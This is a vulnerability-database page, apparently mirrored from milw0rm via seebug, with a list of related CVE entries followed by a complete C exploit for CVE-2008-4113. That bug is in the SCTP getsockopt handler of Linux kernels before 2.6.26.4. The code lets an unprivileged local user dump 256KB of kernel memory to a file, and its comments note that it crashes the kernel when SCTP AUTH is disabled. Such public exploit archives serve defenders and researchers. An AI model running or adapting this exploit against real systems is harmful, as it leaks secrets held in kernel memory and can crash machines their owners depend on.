Lucene search

K

Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 26 Views

Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit by Jon Oberheid

Show more
Related
Code
ReporterTitlePublishedViews
Family
exploitpack
Linux Kernel 2.6.26.4 - SCTP Kernel Memory Disclosure
29 Dec 200800:00
exploitpack
Cvelist
CVE-2008-4113
16 Sep 200823:00
cvelist
Cvelist
CVE-2008-4445
6 Oct 200818:00
cvelist
seebug.org
Linux Kernel &lt; 2.6.26.4 SCTP Kernel Memory Disclosure Exploit
30 Dec 200800:00
seebug
CVE
CVE-2008-4113
16 Sep 200823:00
cve
CVE
CVE-2008-4445
6 Oct 200819:54
cve
Prion
Design/Logic Flaw
16 Sep 200823:00
prion
Prion
Design/Logic Flaw
6 Oct 200819:54
prion
UbuntuCve
CVE-2008-4113
16 Sep 200800:00
ubuntucve
UbuntuCve
CVE-2008-4445
6 Oct 200800:00
ubuntucve
Rows per page

                                                /*
 * cve-2008-4113.c
 *
 * Linux Kernel &#60; 2.6.26.4 SCTP kernel memory disclosure
 * Jon Oberheide &#60;[email protected]&#62;
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113
 *
 *   The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream
 *   Control Transmission Protocol (sctp) implementation in the Linux kernel 
 *   before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an 
 *   untrusted length value to limit copying of data from kernel memory, which 
 *   allows local users to obtain sensitive information via a crafted 
 *   SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.
 *
 * Notes:
 *
 *   If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an 
 *   unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory
 *   out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will 
 *   trigger a kernel OOPS.
 */

#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;string.h&#62;
#include &#60;errno.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;netinet/in.h&#62;
#include &#60;netinet/sctp.h&#62;

#ifndef SCTP_HMAC_IDENT
#define SCTP_HMAC_IDENT 22
#endif

#define DUMP_SIZE 256*1024
#define DUMP_FILE &#34;mem.dump&#34;

int
main(int argc, char **argv)
{
	int ret, sock;
	FILE *dumpfile;
	char *memdump, *err;
	socklen_t memlen = DUMP_SIZE;

	memdump = malloc(DUMP_SIZE);
	if (!memdump) {
		err = &#34;malloc(3) failed&#34;;
		printf(&#34;[-] Error: %s (%s)\n&#34;, err, strerror(errno));
		return 1;
	}
	memset(memdump, 0, DUMP_SIZE);

	printf(&#34;[+] creating IPPROTO_SCTP socket\n&#34;);

	sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
	if (sock == -1) {
		err = &#34;socket(2) failed&#34;;
		printf(&#34;[-] Error: %s (%s)\n&#34;, err, strerror(errno));
		return 1;
	}

	printf(&#34;[+] getting socket option SCTP_HMAC_IDENT with length of %d\n&#34;, memlen);

	ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen);
	if (ret == -1) {
		err = &#34;getsockopt(2) failed&#34;;
		printf(&#34;[-] Error: %s (%s)\n&#34;, err, strerror(errno));
		return 1;
	}

	printf(&#34;[+] dumping %d bytes of kernel memory to %s\n&#34;, memlen, DUMP_FILE);

	dumpfile = fopen(DUMP_FILE, &#34;wb&#34;);
	if (!dumpfile) {
		err = &#34;fopen(3) failed&#34;;
		printf(&#34;[-] Error: %s (%s)\n&#34;, err, strerror(errno));
		return 1;
	}
	fwrite(memdump, 1, memlen, dumpfile);
	fclose(dumpfile);
	
	printf(&#34;[+] done.\n&#34;);

	return 0;
}

// milw0rm.com [2008-12-29]

                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo